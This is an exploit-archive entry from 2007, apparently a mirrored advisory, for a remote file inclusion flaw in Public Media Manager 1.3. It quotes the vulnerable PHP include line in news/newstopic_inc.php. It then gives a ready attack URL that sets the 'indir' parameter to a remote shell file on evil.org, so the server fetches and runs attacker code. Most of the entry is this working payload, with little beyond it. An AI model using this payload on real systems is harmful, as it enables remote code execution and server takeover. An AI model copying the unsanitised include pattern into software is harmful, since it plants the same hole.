Public Media Manager <= 1.3 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Public Media Manager <= 1.3 Remote File Inclusion Vulnerability
# Published : 2007-09-28
# Author : 0in
# Previous Title : PhFiTo 1.3.0 (SRC_PATH) Remote File Inclusion Vulnerability
# Next Title : Zomplog <= 3.8.1 upload_files.php Arbitrary File Upload Exploit

#f0und bY 0in
#Download:http://pmm-cms.sourceforge.net/
BUG:
news/newstopic_inc.php:2:if (!empty($indir)) include_once ($indir)."/newsdb/config.php";

Expl0it:
http://x.com/[path]/news/newstopic_inc.php?indir=http://evil.org/shell.txt

# www.Syue.com [2007-09-28]